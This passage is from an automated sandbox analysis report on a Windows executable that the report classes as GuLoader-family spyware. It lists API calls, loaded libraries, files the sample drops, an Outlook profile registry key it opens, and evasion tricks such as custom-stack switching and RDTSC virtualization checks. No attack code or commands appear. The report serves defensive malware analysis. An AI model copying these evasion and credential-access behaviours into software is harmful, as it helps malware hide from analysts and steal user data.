Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F5AE0	4_2_3A7F5AE0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F28E0	4_2_3A7F28E0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F28CF	4_2_3A7F28CF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F3EC0	4_2_3A7F3EC0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F0CC0	4_2_3A7F0CC0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F54A0	4_2_3A7F54A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F22A0	4_2_3A7F22A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F3880	4_2_3A7F3880
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F0680	4_2_3A7F0680
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F6A80	4_2_3A7F6A80
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F6760	4_2_3A7F6760
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F3560	4_2_3A7F3560
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F0360	4_2_3A7F0360
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F0350	4_2_3A7F0350
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F4B40	4_2_3A7F4B40
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F1940	4_2_3A7F1940
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F6120	4_2_3A7F6120
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F2F20	4_2_3A7F2F20
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F4500	4_2_3A7F4500
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F1300	4_2_3A7F1300
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F41E0	4_2_3A7F41E0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F0FE0	4_2_3A7F0FE0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F0FD0	4_2_3A7F0FD0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F41D0	4_2_3A7F41D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F57C0	4_2_3A7F57C0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F25C0	4_2_3A7F25C0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F6DA0	4_2_3A7F6DA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F3BA0	4_2_3A7F3BA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F09A0	4_2_3A7F09A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F5180	4_2_3A7F5180
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F1F80	4_2_3A7F1F80
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A801CF0	4_2_3A801CF0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A808470	4_2_3A808470
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80FB30	4_2_3A80FB30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A800E8B	4_2_3A800E8B
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80A090	4_2_3A80A090
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80D290	4_2_3A80D290
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A800E98	4_2_3A800E98
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80BCB0	4_2_3A80BCB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A808AB0	4_2_3A808AB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80EEB0	4_2_3A80EEB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80D8D0	4_2_3A80D8D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80A6D0	4_2_3A80A6D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A801CE0	4_2_3A801CE0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80F4F0	4_2_3A80F4F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A8090F0	4_2_3A8090F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80C2F0	4_2_3A80C2F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A8004FB	4_2_3A8004FB
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A800007	4_2_3A800007
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80C610	4_2_3A80C610
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A809410	4_2_3A809410
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80F810	4_2_3A80F810
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A801817	4_2_3A801817
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A801828	4_2_3A801828
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80B030	4_2_3A80B030
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80E230	4_2_3A80E230
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A800040	4_2_3A800040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80CC41	4_2_3A80CC41
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A809A50	4_2_3A809A50
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80CC50	4_2_3A80CC50
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80E870	4_2_3A80E870
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80B670	4_2_3A80B670
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80B990	4_2_3A80B990
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A808790	4_2_3A808790
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80EB90	4_2_3A80EB90
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80D5B0	4_2_3A80D5B0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80A3B0	4_2_3A80A3B0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A8009BF	4_2_3A8009BF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80F1D0	4_2_3A80F1D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A8009D0	4_2_3A8009D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A808DD0	4_2_3A808DD0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80BFD0	4_2_3A80BFD0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A8035E8	4_2_3A8035E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80DBF0	4_2_3A80DBF0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80A9F0	4_2_3A80A9F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A800508	4_2_3A800508
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80AD10	4_2_3A80AD10
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80DF10	4_2_3A80DF10
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80C930	4_2_3A80C930
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A809730	4_2_3A809730
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80E550	4_2_3A80E550
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80B350	4_2_3A80B350
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A801351	4_2_3A801351
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A801360	4_2_3A801360
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A803360	4_2_3A803360
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A809D70	4_2_3A809D70
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A80CF70	4_2_3A80CF70
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A841B50	4_2_3A841B50
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A843008	4_2_3A843008
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A8436F0	4_2_3A8436F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A841470	4_2_3A841470
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A842920	4_2_3A842920
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A840D88	4_2_3A840D88
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A842238	4_2_3A842238
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A841B3F	4_2_3A841B3F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A8436E1	4_2_3A8436E1
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A841460	4_2_3A841460
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A840A03	4_2_3A840A03
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A840A10	4_2_3A840A10
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A842911	4_2_3A842911
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A842FFB	4_2_3A842FFB
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A840D7B	4_2_3A840D7B
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A842229	4_2_3A842229
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A840007	4_2_3A840007
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A840040	4_2_3A840040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A939771	4_2_3A939771
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A930F74	4_2_3A930F74
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A932530	4_2_3A932530

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: String function: 00402BBF appears 51 times

Uses 32bit PE files

Source: JOSXXL1.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/7@6/5

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004033B6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004033B6

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_004046E2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046E2

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\JOSXXL1.exe

File created: C:\Users\user\AppData\Local\indvandrings

Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\JOSXXL1.exe

File created: C:\Users\user\AppData\Local\Temp\nsxA531.tmp

Jump to behavior

Source: JOSXXL1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\JOSXXL1.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: JOSXXL1.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\JOSXXL1.exe

File read: C:\Users\user\Desktop\JOSXXL1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\JOSXXL1.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: JOSXXL1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.2321723084.000000000890B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\JOSXXL1.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_3_0019CA98 pushfd ; retf 0019h	4_3_0019CA99
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_3_0019EE18 push eax; iretd	4_3_0019EE65
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_3_0019EE8C push eax; iretd	4_3_0019EEA9
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_3_0019CF4C push eax; iretd	4_3_0019CF4D
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00159C30 push esp; retf 0017h	4_2_00159D55

Drops PE files

Source: C:\Users\user\Desktop\JOSXXL1.exe

File created: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JOSXXL1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\JOSXXL1.exe	API/Special instruction interceptor: Address: 91911FA
Source: C:\Users\user\Desktop\JOSXXL1.exe	API/Special instruction interceptor: Address: 49011FA

Tries to detect virtualization through RDTSC time measurements

